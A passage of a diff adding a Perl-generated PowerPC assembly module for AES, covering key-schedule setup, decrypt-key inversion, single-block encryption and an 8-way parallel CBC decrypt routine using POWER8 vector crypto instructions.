+	 vsldoi		$stage,$zero,$in1,8
+	vspltw		$tmp,$in0,3
+	vxor		$tmp,$tmp,$in1
+	vsldoi		$in1,$zero,$in1,12	# >>32
+	 vadduwm	$rcon,$rcon,$rcon
+	vxor		$in1,$in1,$tmp
+	vxor		$in0,$in0,$key
+	vxor		$in1,$in1,$key
+	 vsldoi		$stage,$stage,$in0,8
+
+	vperm		$key,$in1,$in1,$mask	# rotate-n-splat
+	vsldoi		$tmp,$zero,$in0,12	# >>32
+	 vperm		$outtail,$stage,$stage,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	vcipherlast	$key,$key,$rcon
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+
+	 vsldoi		$stage,$in0,$in1,8
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	 vperm		$outtail,$stage,$stage,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+
+	vspltw		$tmp,$in0,3
+	vxor		$tmp,$tmp,$in1
+	vsldoi		$in1,$zero,$in1,12	# >>32
+	 vadduwm	$rcon,$rcon,$rcon
+	vxor		$in1,$in1,$tmp
+	vxor		$in0,$in0,$key
+	vxor		$in1,$in1,$key
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	 stvx		$stage,0,$out
+	 addi		$inp,$out,15		# 15 is not typo
+	 addi		$out,$out,16
+	bdnz		Loop192
+
+	li		$rounds,12
+	addi		$out,$out,0x20
+	b		Ldone
+
+.align	4
+L256:
+	lvx		$tmp,0,$inp
+	li		$cnt,7
+	li		$rounds,14
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+	vperm		$in1,$in1,$tmp,$key	# align [and byte swap in LE]
+	mtctr		$cnt
+
+Loop256:
+	vperm		$key,$in1,$in1,$mask	# rotate-n-splat
+	vsldoi		$tmp,$zero,$in0,12	# >>32
+	 vperm		$outtail,$in1,$in1,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	vcipherlast	$key,$key,$rcon
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	 vadduwm	$rcon,$rcon,$rcon
+	vxor		$in0,$in0,$key
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	 stvx		$stage,0,$out
+	 addi		$inp,$out,15		# 15 is not typo
+	 addi		$out,$out,16
+	bdz		Ldone
+
+	vspltw		$key,$in0,3		# just splat
+	vsldoi		$tmp,$zero,$in1,12	# >>32
+	vsbox		$key,$key
+
+	vxor		$in1,$in1,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in1,$in1,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in1,$in1,$tmp
+
+	vxor		$in1,$in1,$key
+	b		Loop256
+
+.align	4
+Ldone:
+	lvx		$in1,0,$inp		# redundant in aligned case
+	vsel		$in1,$outhead,$in1,$outmask
+	stvx		$in1,0,$inp
+	li		$ptr,0
+	mtspr		256,$vrsave
+	stw		$rounds,0($out)
+
+Lenc_key_abort:
+	mr		r3,$ptr
+	blr
+	.long		0
+	.byte		0,12,0x14,1,0,0,3,0
+	.long		0
+.size	.${prefix}_set_encrypt_key,.-.${prefix}_set_encrypt_key
+
+.globl	.${prefix}_set_decrypt_key
+.align	5
+.${prefix}_set_decrypt_key:
+	$STU		$sp,-$FRAME($sp)
+	mflr		r10
+	$PUSH		r10,$FRAME+$LRSAVE($sp)
+	bl		Lset_encrypt_key
+	mtlr		r10
+
+	cmpwi		r3,0
+	bne-		Ldec_key_abort
+
+	slwi		$cnt,$rounds,4
+	subi		$inp,$out,240		# first round key
+	srwi		$rounds,$rounds,1
+	add		$out,$inp,$cnt		# last round key
+	mtctr		$rounds
+
+Ldeckey:
+	lwz		r0, 0($inp)
+	lwz		r6, 4($inp)
+	lwz		r7, 8($inp)
+	lwz		r8, 12($inp)
+	addi		$inp,$inp,16
+	lwz		r9, 0($out)
+	lwz		r10,4($out)
+	lwz		r11,8($out)
+	lwz		r12,12($out)
+	stw		r0, 0($out)
+	stw		r6, 4($out)
+	stw		r7, 8($out)
+	stw		r8, 12($out)
+	subi		$out,$out,16
+	stw		r9, -16($inp)
+	stw		r10,-12($inp)
+	stw		r11,-8($inp)
+	stw		r12,-4($inp)
+	bdnz		Ldeckey
+
+	xor		r3,r3,r3		# return value
+Ldec_key_abort:
+	addi		$sp,$sp,$FRAME
+	blr
+	.long		0
+	.byte		0,12,4,1,0x80,0,3,0
+	.long		0
+.size	.${prefix}_set_decrypt_key,.-.${prefix}_set_decrypt_key
+___
+}}}
+#########################################################################
+{{{	# Single block en- and decrypt procedures			#
+sub gen_block () {
+my $dir = shift;
+my $n   = $dir eq "de" ? "n" : "";
+my ($inp,$out,$key,$rounds,$idx)=map("r$_",(3..7));
+
+$code.=<<___;
+.globl	.${prefix}_${dir}crypt
+.align	5
+.${prefix}_${dir}crypt:
+	lwz		$rounds,240($key)
+	lis		r0,0xfc00
+	mfspr		$vrsave,256
+	li		$idx,15			# 15 is not typo
+	mtspr		256,r0
+
+	lvx		v0,0,$inp
+	neg		r11,$out
+	lvx		v1,$idx,$inp
+	lvsl		v2,0,$inp		# inpperm
+	le?vspltisb	v4,0x0f
+	?lvsl		v3,0,r11		# outperm
+	le?vxor		v2,v2,v4
+	li		$idx,16
+	vperm		v0,v0,v1,v2		# align [and byte swap in LE]
+	lvx		v1,0,$key
+	?lvsl		v5,0,$key		# keyperm
+	srwi		$rounds,$rounds,1
+	lvx		v2,$idx,$key
+	addi		$idx,$idx,16
+	subi		$rounds,$rounds,1
+	?vperm		v1,v1,v2,v5		# align round key
+
+	vxor		v0,v0,v1
+	lvx		v1,$idx,$key
+	addi		$idx,$idx,16
+	mtctr		$rounds
+
+Loop_${dir}c:
+	?vperm		v2,v2,v1,v5
+	v${n}cipher	v0,v0,v2
+	lvx		v2,$idx,$key
+	addi		$idx,$idx,16
+	?vperm		v1,v1,v2,v5
+	v${n}cipher	v0,v0,v1
+	lvx		v1,$idx,$key
+	addi		$idx,$idx,16
+	bdnz		Loop_${dir}c
+
+	?vperm		v2,v2,v1,v5
+	v${n}cipher	v0,v0,v2
+	lvx		v2,$idx,$key
+	?vperm		v1,v1,v2,v5
+	v${n}cipherlast	v0,v0,v1
+
+	vspltisb	v2,-1
+	vxor		v1,v1,v1
+	li		$idx,15			# 15 is not typo
+	?vperm		v2,v1,v2,v3		# outmask
+	le?vxor		v3,v3,v4
+	lvx		v1,0,$out		# outhead
+	vperm		v0,v0,v0,v3		# rotate [and byte swap in LE]
+	vsel		v1,v1,v0,v2
+	lvx		v4,$idx,$out
+	stvx		v1,0,$out
+	vsel		v0,v0,v4,v2
+	stvx		v0,$idx,$out
+
+	mtspr		256,$vrsave
+	blr
+	.long		0
+	.byte		0,12,0x14,0,0,0,3,0
+	.long		0
+.size	.${prefix}_${dir}crypt,.-.${prefix}_${dir}crypt
+___
+}
+&gen_block("en");
+&gen_block("de");
+}}}
+#########################################################################
+{{{	# CBC en- and decrypt procedures				#
+my ($inp,$out,$len,$key,$ivp,$enc,$rounds,$idx)=map("r$_",(3..10));
+my ($rndkey0,$rndkey1,$inout,$tmp)=		map("v$_",(0..3));
+my ($ivec,$inptail,$inpperm,$outhead,$outperm,$outmask,$keyperm)=
+						map("v$_",(4..10));
+$code.=<<___;
+.globl	.${prefix}_cbc_encrypt
+.align	5
+.${prefix}_cbc_encrypt:
+	${UCMP}i	$len,16
+	bltlr-
+
+	cmpwi		$enc,0			# test direction
+	lis		r0,0xffe0
+	mfspr		$vrsave,256
+	mtspr		256,r0
+
+	li		$idx,15
+	vxor		$rndkey0,$rndkey0,$rndkey0
+	le?vspltisb	$tmp,0x0f
+
+	lvx		$ivec,0,$ivp		# load [unaligned] iv
+	lvsl		$inpperm,0,$ivp
+	lvx		$inptail,$idx,$ivp
+	le?vxor		$inpperm,$inpperm,$tmp
+	vperm		$ivec,$ivec,$inptail,$inpperm
+
+	neg		r11,$inp
+	?lvsl		$keyperm,0,$key		# prepare for unaligned key
+	lwz		$rounds,240($key)
+
+	lvsr		$inpperm,0,r11		# prepare for unaligned load
+	lvx		$inptail,0,$inp
+	addi		$inp,$inp,15		# 15 is not typo
+	le?vxor		$inpperm,$inpperm,$tmp
+
+	?lvsr		$outperm,0,$out		# prepare for unaligned store
+	vspltisb	$outmask,-1
+	lvx		$outhead,0,$out
+	?vperm		$outmask,$rndkey0,$outmask,$outperm
+	le?vxor		$outperm,$outperm,$tmp
+
+	srwi		$rounds,$rounds,1
+	li		$idx,16
+	subi		$rounds,$rounds,1
+	beq		Lcbc_dec
+
+Lcbc_enc:
+	vmr		$inout,$inptail
+	lvx		$inptail,0,$inp
+	addi		$inp,$inp,16
+	mtctr		$rounds
+	subi		$len,$len,16		# len-=16
+
+	lvx		$rndkey0,0,$key
+	 vperm		$inout,$inout,$inptail,$inpperm
+	lvx		$rndkey1,$idx,$key
+	addi		$idx,$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vxor		$inout,$inout,$rndkey0
+	lvx		$rndkey0,$idx,$key
+	addi		$idx,$idx,16
+	vxor		$inout,$inout,$ivec
+
+Loop_cbc_enc:
+	?vperm		$rndkey1,$rndkey1,$rndkey0,$keyperm
+	vcipher		$inout,$inout,$rndkey1
+	lvx		$rndkey1,$idx,$key
+	addi		$idx,$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vcipher		$inout,$inout,$rndkey0
+	lvx		$rndkey0,$idx,$key
+	addi		$idx,$idx,16
+	bdnz		Loop_cbc_enc
+
+	?vperm		$rndkey1,$rndkey1,$rndkey0,$keyperm
+	vcipher		$inout,$inout,$rndkey1
+	lvx		$rndkey1,$idx,$key
+	li		$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vcipherlast	$ivec,$inout,$rndkey0
+	${UCMP}i	$len,16
+
+	vperm		$tmp,$ivec,$ivec,$outperm
+	vsel		$inout,$outhead,$tmp,$outmask
+	vmr		$outhead,$tmp
+	stvx		$inout,0,$out
+	addi		$out,$out,16
+	bge		Lcbc_enc
+
+	b		Lcbc_done
+
+.align	4
+Lcbc_dec:
+	${UCMP}i	$len,128
+	bge		_aesp8_cbc_decrypt8x
+	vmr		$tmp,$inptail
+	lvx		$inptail,0,$inp
+	addi		$inp,$inp,16
+	mtctr		$rounds
+	subi		$len,$len,16		# len-=16
+
+	lvx		$rndkey0,0,$key
+	 vperm		$tmp,$tmp,$inptail,$inpperm
+	lvx		$rndkey1,$idx,$key
+	addi		$idx,$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vxor		$inout,$tmp,$rndkey0
+	lvx		$rndkey0,$idx,$key
+	addi		$idx,$idx,16
+
+Loop_cbc_dec:
+	?vperm		$rndkey1,$rndkey1,$rndkey0,$keyperm
+	vncipher	$inout,$inout,$rndkey1
+	lvx		$rndkey1,$idx,$key
+	addi		$idx,$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vncipher	$inout,$inout,$rndkey0
+	lvx		$rndkey0,$idx,$key
+	addi		$idx,$idx,16
+	bdnz		Loop_cbc_dec
+
+	?vperm		$rndkey1,$rndkey1,$rndkey0,$keyperm
+	vncipher	$inout,$inout,$rndkey1
+	lvx		$rndkey1,$idx,$key
+	li		$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vncipherlast	$inout,$inout,$rndkey0
+	${UCMP}i	$len,16
+
+	vxor		$inout,$inout,$ivec
+	vmr		$ivec,$tmp
+	vperm		$tmp,$inout,$inout,$outperm
+	vsel		$inout,$outhead,$tmp,$outmask
+	vmr		$outhead,$tmp
+	stvx		$inout,0,$out
+	addi		$out,$out,16
+	bge		Lcbc_dec
+
+Lcbc_done:
+	addi		$out,$out,-1
+	lvx		$inout,0,$out		# redundant in aligned case
+	vsel		$inout,$outhead,$inout,$outmask
+	stvx		$inout,0,$out
+
+	neg		$enc,$ivp		# write [unaligned] iv
+	li		$idx,15			# 15 is not typo
+	vxor		$rndkey0,$rndkey0,$rndkey0
+	vspltisb	$outmask,-1
+	le?vspltisb	$tmp,0x0f
+	?lvsl		$outperm,0,$enc
+	?vperm		$outmask,$rndkey0,$outmask,$outperm
+	le?vxor		$outperm,$outperm,$tmp
+	lvx		$outhead,0,$ivp
+	vperm		$ivec,$ivec,$ivec,$outperm
+	vsel		$inout,$outhead,$ivec,$outmask
+	lvx		$inptail,$idx,$ivp
+	stvx		$inout,0,$ivp
+	vsel		$inout,$ivec,$inptail,$outmask
+	stvx		$inout,$idx,$ivp
+
+	mtspr		256,$vrsave
+	blr
+	.long		0
+	.byte		0,12,0x14,0,0,0,6,0
+	.long		0
+___
+#########################################################################
+{{	# Optimized CBC decrypt procedure				#
+my $key_="r11";
+my ($x00,$x10,$x20,$x30,$x40,$x50,$x60,$x70)=map("r$_",(0,8,26..31));
+    $x00=0 if ($flavour =~ /osx/);
+my ($in0, $in1, $in2, $in3, $in4, $in5, $in6, $in7 )=map("v$_",(0..3,10..13));
+my ($out0,$out1,$out2,$out3,$out4,$out5,$out6,$out7)=map("v$_",(14..21));
+my $rndkey0="v23";	# v24-v25 rotating buffer for first found keys
+			# v26-v31 last 6 round keys
+my ($tmp,$keyperm)=($in3,$in4);	# aliases with "caller", redundant assignment
+
+$code.=<<___;
+.align	5
+_aesp8_cbc_decrypt8x:
+	$STU		$sp,-`($FRAME+21*16+6*$SIZE_T)`($sp)
+	li		r10,`$FRAME+8*16+15`
+	li		r11,`$FRAME+8*16+31`
+	stvx		v20,r10,$sp		# ABI says so
+	addi		r10,r10,32
+	stvx		v21,r11,$sp
+	addi		r11,r11,32
+	stvx		v22,r10,$sp
+	addi		r10,r10,32
+	stvx		v23,r11,$sp
+	addi		r11,r11,32
+	stvx		v24,r10,$sp
+	addi		r10,r10,32
+	stvx		v25,r11,$sp
+	addi		r11,r11,32
+	stvx		v26,r10,$sp
+	addi		r10,r10,32
+	stvx		v27,r11,$sp
+	addi		r11,r11,32
+	stvx		v28,r10,$sp
+	addi		r10,r10,32
+	stvx		v29,r11,$sp
+	addi		r11,r11,32
+	stvx		v30,r10,$sp
+	stvx		v31,r11,$sp
+	li		r0,-1
+	stw		$vrsave,`$FRAME+21*16-4`($sp)	# save vrsave
+	li		$x10,0x10
+	$PUSH		r26,`$FRAME+21*16+0*$SIZE_T`($sp)
+	li		$x20,0x20
+	$PUSH		r27,`$FRAME+21*16+1*$SIZE_T`($sp)
+	li		$x30,0x30
+	$PUSH		r28,`$FRAME+21*16+2*$SIZE_T`($sp)
+	li		$x40,0x40
+	$PUSH		r29,`$FRAME+21*16+3*$SIZE_T`($sp)
+	li		$x50,0x50
+	$PUSH		r30,`$FRAME+21*16+4*$SIZE_T`($sp)
+	li		$x60,0x60
+	$PUSH		r31,`$FRAME+21*16+5*$SIZE_T`($sp)
+	li		$x70,0x70
+	mtspr		256,r0
+
+	subi		$rounds,$rounds,3	# -4 in total
+	subi		$len,$len,128		# bias
+
+	lvx		$rndkey0,$x00,$key	# load key schedule
+	lvx		v30,$x10,$key
+	addi		$key,$key,0x20
+	lvx		v31,$x00,$key
+	?vperm		$rndkey0,$rndkey0,v30,$keyperm
+	addi		$key_,$sp,$FRAME+15
+	mtctr		$rounds
+
+Load_cbc_dec_key:
+	?vperm		v24,v30,v31,$keyperm
+	lvx		v30,$x10,$key
+	addi		$key,$key,0x20
+	stvx		v24,$x00,$key_		# off-load round[1]
+	?vperm		v25,v31,v30,$keyperm
+	lvx		v31,$x00,$key
+	stvx		v25,$x10,$key_		# off-load round[2]
+	addi		$key_,$key_,0x20
+	bdnz		Load_cbc_dec_key
+
+	lvx		v26,$x10,$key
+	?vperm		v24,v30,v31,$keyperm
+	lvx		v27,$x20,$key
+	stvx		v24,$x00,$key_		# off-load round[3]
+	?vperm		v25,v31,v26,$keyperm
+	lvx		v28,$x30,$key
+	stvx		v25,$x10,$key_		# off-load round[4]
+	addi		$key_,$sp,$FRAME+15	# rewind $key_
+	?vperm		v26,v26,v27,$keyperm
+	lvx		v29,$x40,$key
+	?vperm		v27,v27,v28,$keyperm
+	lvx		v30,$x50,$key
+	?vperm		v28,v28,v29,$keyperm
+	lvx		v31,$x60,$key
+	?vperm		v29,v29,v30,$keyperm
+	lvx		$out0,$x70,$key		# borrow $out0
+	?vperm		v30,v30,v31,$keyperm
+	lvx		v24,$x00,$key_		# pre-load round[1]
+	?vperm		v31,v31,$out0,$keyperm
+	lvx		v25,$x10,$key_		# pre-load round[2]
+
+	#lvx		$inptail,0,$inp		# "caller" already did this
+	#addi		$inp,$inp,15		# 15 is not typo
+	subi		$inp,$inp,15		# undo "caller"
+
+	 le?li		$idx,8
+	lvx_u		$in0,$x00,$inp		# load first 8 "words"
+	 le?lvsl	$inpperm,0,$idx
+	 le?vspltisb	$tmp,0x0f
+	lvx_u		$in1,$x10,$inp
+	 le?vxor	$inpperm,$inpperm,$tmp	# transform for lvx_u/stvx_u
+	lvx_u		$in2,$x20,$inp
+	 le?vperm	$in0,$in0,$in0,$inpperm
+	lvx_u		$in3,$x30,$inp
+	 le?vperm	$in1,$in1,$in1,$inpperm
+	lvx_u		$in4,$x40,$inp
+	 le?vperm	$in2,$in2,$in2,$inpperm
+	vxor		$out0,$in0,$rndkey0
+	lvx_u		$in5,$x50,$inp
+	 le?vperm	$in3,$in3,$in3,$inpperm
+	vxor		$out1,$in1,$rndkey0
+	lvx_u		$in6,$x60,$inp
+	 le?vperm	$in4,$in4,$in4,$inpperm
+	vxor		$out2,$in2,$rndkey0
+	lvx_u		$in7,$x70,$inp
+	addi		$inp,$inp,0x80
+	 le?vperm	$in5,$in5,$in5,$inpperm
+	vxor		$out3,$in3,$rndkey0
+	 le?vperm	$in6,$in6,$in6,$inpperm
+	vxor		$out4,$in4,$rndkey0
+	 le?vperm	$in7,$in7,$in7,$inpperm
+	vxor		$out5,$in5,$rndkey0
+	vxor		$out6,$in6,$rndkey0
+	vxor		$out7,$in7,$rndkey0
+
+	mtctr		$rounds
+	b		Loop_cbc_dec8x
+.align	5
+Loop_cbc_dec8x:
+	vncipher	$out0,$out0,v24
+	vncipher	$out1,$out1,v24
+	vncipher	$out2,$out2,v24
+	vncipher	$out3,$out3,v24
+	vncipher	$out4,$out4,v24
+	vncipher	$out5,$out5,v24
+	vncipher	$out6,$out6,v24
+	vncipher	$out7,$out7,v24
+	lvx		v24,$x20,$key_		# round[3]
+	addi		$key_,$key_,0x20
+
+	vncipher	$out0,$out0,v25
+	vncipher	$out1,$out1,v25
+	vncipher	$out2,$out2,v25
+	vncipher	$out3,$out3,v25
+	vncipher	$out4,$out4,v25
+	vncipher	$out5,$out5,v25
+	vncipher	$out6,$out6,v25
+	vncipher	$out7,$out7,v25
+	lvx		v25,$x10,$key_		# round[4]
+	bdnz		Loop_cbc_dec8x
+
+	subic		$len,$len,128		# $len-=128
+	vncipher	$out0,$out0,v24
+	vncipher	$out1,$out1,v24
+	vncipher	$out2,$out2,v24
+	vncipher	$out3,$out3,v24
+	vncipher	$out4,$out4,v24
+	vncipher	$out5,$out5,v24
+	vncipher	$out6,$out6,v24
+	vncipher	$out7,$out7,v24
+
+	subfe.		r0,r0,r0		# borrow?-1:0
+	vncipher	$out0,$out0,v25
+	vncipher	$out1,$out1,v25
+	vncipher	$out2,$out2,v25
+	vncipher	$out3,$out3,v25
+	vncipher	$out4,$out4,v25
+	vncipher	$out5,$out5,v25
+	vncipher	$out6,$out6,v25
+	vncipher	$out7,$out7,v25
+
+	and		r0,r0,$len
+	vncipher	$out0,$out0,v26
+	vncipher	$out1,$out1,v26
+	vncipher	$out2,$out2,v26
+	vncipher	$out3,$out3,v26
+	vncipher	$out4,$out4,v26
+	vncipher	$out5,$out5,v26
+	vncipher	$out6,$out6,v26
+	vncipher	$out7,$out7,v26
+
+	add		$inp,$inp,r0		# $inp is adjusted in such
+						# way that at exit from the
+						# loop inX-in7 are loaded
+						# with last "words"
+	vncipher	$out0,$out0,v27
+	vncipher	$out1,$out1,v27
+	vncipher	$out2,$out2,v27
+	vncipher	$out3,$out3,v27
+	vncipher	$out4,$out4,v27
+	vncipher	$out5,$out5,v27
+	vncipher	$out6,$out6,v27
+	vncipher	$out7,$out7,v27
+
+	addi		$key_,$sp,$FRAME+15	# rewind $key_
+	vncipher	$out0,$out0,v28
+	vncipher	$out1,$out1,v28
+	vncipher	$out2,$out2,v28
+	vncipher	$out3,$out3,v28
+	vncipher	$out4,$out4,v28
+	vncipher	$out5,$out5,v28
+	vncipher	$out6,$out6,v28
+	vncipher	$out7,$out7,v28
+	lvx		v24,$x00,$key_		# re-pre-load round[1]
+
+	vncipher	$out0,$out0,v29
+	vncipher	$out1,$out1,v29
+	vncipher	$out2,$out2,v29
+	vncipher	$out3,$out3,v29
+	vncipher	$out4,$out4,v29
+	vncipher	$out5,$out5,v29
+	vncipher	$out6,$out6,v29
+	vncipher	$out7,$out7,v29
+	lvx		v25,$x10,$key_		# re-pre-load round[2]
+
+	vncipher	$out0,$out0,v30
+	 vxor		$ivec,$ivec,v31		# xor with last round key
+	vncipher	$out1,$out1,v30
+	 vxor		$in0,$in0,v31
+	vncipher	$out2,$out2,v30
+	 vxor		$in1,$in1,v31
+	vncipher	$out3,$out3,v30
+	 vxor		$in2,$in2,v31
+	vncipher	$out4,$out4,v30
+	 vxor		$in3,$in3,v31
+	vncipher	$out5,$out5,v30
+	 vxor		$in4,$in4,v31
+	vncipher	$out6,$out6,v30
+	 vxor		$in5,$in5,v31
+	vncipher	$out7,$out7,v30
+	 vxor		$in6,$in6,v31
+
+	vncipherlast	$out0,$out0,$ivec
+	vncipherlast	$out1,$out1,$in0
+	 lvx_u		$in0,$x00,$inp		# load next input block
+	vncipherlast	$out2,$out2,$in1
+	 lvx_u		$in1,$x10,$inp
+	vncipherlast	$out3,$out3,$in2
+	 le?vperm	$in0,$in0,$in0,$inpperm
+	 lvx_u		$in2,$x20,$inp
+	vncipherlast	$out4,$out4,$in3
+	 le?vperm	$in1,$in1,$in1,$inpperm
+	 lvx_u		$in3,$x30,$inp
+	vncipherlast	$out5,$out5,$in4
+	 le?vperm	$in2,$in2,$in2,$inpperm
+	 lvx_u		$in4,$x40,$inp
+	vncipherlast	$out6,$out6,$in5
+	 le?vperm	$in3,$in3,$in3,$inpperm
+	 lvx_u		$in5,$x50,$inp
+	vncipherlast	$out7,$out7,$in6
+	 le?vperm	$in4,$in4,$in4,$inpperm
+	 lvx_u		$in6,$x60,$inp
+	vmr		$ivec,$in7
+	 le?vperm	$in5,$in5,$in5,$inpperm
+	 lvx_u		$in7,$x70,$inp
+	 addi		$inp,$inp,0x80
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	 le?vperm	$in6,$in6,$in6,$inpperm
+	 vxor		$out0,$in0,$rndkey0
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x10,$out
+	 le?vperm	$in7,$in7,$in7,$inpperm
+	 vxor		$out1,$in1,$rndkey0
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x20,$out
+	 vxor		$out2,$in2,$rndkey0
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x30,$out
+	 vxor		$out3,$in3,$rndkey0
+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x40,$out
+	 vxor		$out4,$in4,$rndkey0
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x50,$out
+	 vxor		$out5,$in5,$rndkey0
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x60,$out
+	 vxor		$out6,$in6,$rndkey0
+	stvx_u		$out7,$x70,$out
+	addi		$out,$out,0x80
+	 vxor		$out7,$in7,$rndkey0
+
+	mtctr		$rounds
+	beq		Loop_cbc_dec8x		# did $len-=128 borrow?
+
+	addic.		$len,$len,128
+	beq		Lcbc_dec8x_done
+	nop
+	nop
+
+Loop_cbc_dec8x_tail:				# up to 7 "words" tail...
+	vncipher	$out1,$out1,v24
+	vncipher	$out2,$out2,v24
+	vncipher	$out3,$out3,v24
+	vncipher	$out4,$out4,v24
+	vncipher	$out5,$out5,v24
+	vncipher	$out6,$out6,v24
+	vncipher	$out7,$out7,v24
+	lvx		v24,$x20,$key_		# round[3]
+	addi		$key_,$key_,0x20
+
+	vncipher	$out1,$out1,v25
+	vncipher	$out2,$out2,v25
+	vncipher	$out3,$out3,v25
+	vncipher	$out4,$out4,v25
+	vncipher	$out5,$out5,v25
+	vncipher	$out6,$out6,v25
+	vncipher	$out7,$out7,v25
+	lvx		v25,$x10,$key_		# round[4]
+	bdnz		Loop_cbc_dec8x_tail
+
+	vncipher	$out1,$out1,v24
+	vncipher	$out2,$out2,v24
+	vncipher	$out3,$out3,v24
+	vncipher	$out4,$out4,v24
+	vncipher	$out5,$out5,v24
+	vncipher	$out6,$out6,v24
+	vncipher	$out7,$out7,v24
+
+	vncipher	$out1,$out1,v25
+	vncipher	$out2,$out2,v25
+	vncipher	$out3,$out3,v25
+	vncipher	$out4,$out4,v25
+	vncipher	$out5,$out5,v25
+	vncipher	$out6,$out6,v25
+	vncipher	$out7,$out7,v25
+
+	vncipher	$out1,$out1,v26
+	vncipher	$out2,$out2,v26
+	vncipher	$out3,$out3,v26
+	vncipher	$out4,$out4,v26
+	vncipher	$out5,$out5,v26
+	vncipher	$out6,$out6,v26
+	vncipher	$out7,$out7,v26
+
+	vncipher	$out1,$out1,v27
+	vncipher	$out2,$out2,v27
+	vncipher	$out3,$out3,v27
+	vncipher	$out4,$out4,v27
+	vncipher	$out5,$out5,v27
+	vncipher	$out6,$out6,v27
+	vncipher	$out7,$out7,v27
+
+	vncipher	$out1,$out1,v28
+	vncipher	$out2,$out2,v28
+	vncipher	$out3,$out3,v28
+	vncipher	$out4,$out4,v28
+	vncipher	$out5,$out5,v28
+	vncipher	$out6,$out6,v28
+	vncipher	$out7,$out7,v28
+
+	vncipher	$out1,$out1,v29
+	vncipher	$out2,$out2,v29
+	vncipher	$out3,$out3,v29
+	vncipher	$out4,$out4,v29
+	vncipher	$out5,$out5,v29
+	vncipher	$out6,$out6,v29
+	vncipher	$out7,$out7,v29
+
+	vncipher	$out1,$out1,v30
+	 vxor		$ivec,$ivec,v31		# last round key
+	vncipher	$out2,$out2,v30
+	 vxor		$in1,$in1,v31
+	vncipher	$out3,$out3,v30
+	 vxor		$in2,$in2,v31
+	vncipher	$out4,$out4,v30
+	 vxor		$in3,$in3,v31
+	vncipher	$out5,$out5,v30
+	 vxor		$in4,$in4,v31
+	vncipher	$out6,$out6,v30
+	 vxor		$in5,$in5,v31
+	vncipher	$out7,$out7,v30
+	 vxor		$in6,$in6,v31
+
+	cmplwi		$len,32			# switch($len)
+	blt		Lcbc_dec8x_one
+	nop
+	beq		Lcbc_dec8x_two
+	cmplwi		$len,64
+	blt		Lcbc_dec8x_three
+	nop
+	beq		Lcbc_dec8x_four
+	cmplwi		$len,96
+	blt		Lcbc_dec8x_five
+	nop
+	beq		Lcbc_dec8x_six
+
+Lcbc_dec8x_seven:
+	vncipherlast	$out1,$out1,$ivec
+	vncipherlast	$out2,$out2,$in1
+	vncipherlast	$out3,$out3,$in2
+	vncipherlast	$out4,$out4,$in3
+	vncipherlast	$out5,$out5,$in4
+	vncipherlast	$out6,$out6,$in5
+	vncipherlast	$out7,$out7,$in6
+	vmr		$ivec,$in7
+
+	le?vperm	$out1,$out1,$out1,$inpperm
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x00,$out
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x10,$out
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x20,$out
+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x30,$out
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x40,$out
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x50,$out
+	stvx_u		$out7,$x60,$out
+	addi		$out,$out,0x70
+	b		Lcbc_dec8x_done
+
+.align	5
+Lcbc_dec8x_six:
+	vncipherlast	$out2,$out2,$ivec
+	vncipherlast	$out3,$out3,$in2
+	vncipherlast	$out4,$out4,$in3
+	vncipherlast	$out5,$out5,$in4
+	vncipherlast	$out6,$out6,$in5
+	vncipherlast	$out7,$out7,$in6
+	vmr		$ivec,$in7
+
+	le?vperm	$out2,$out2,$out2,$inpperm
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x00,$out
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x10,$out
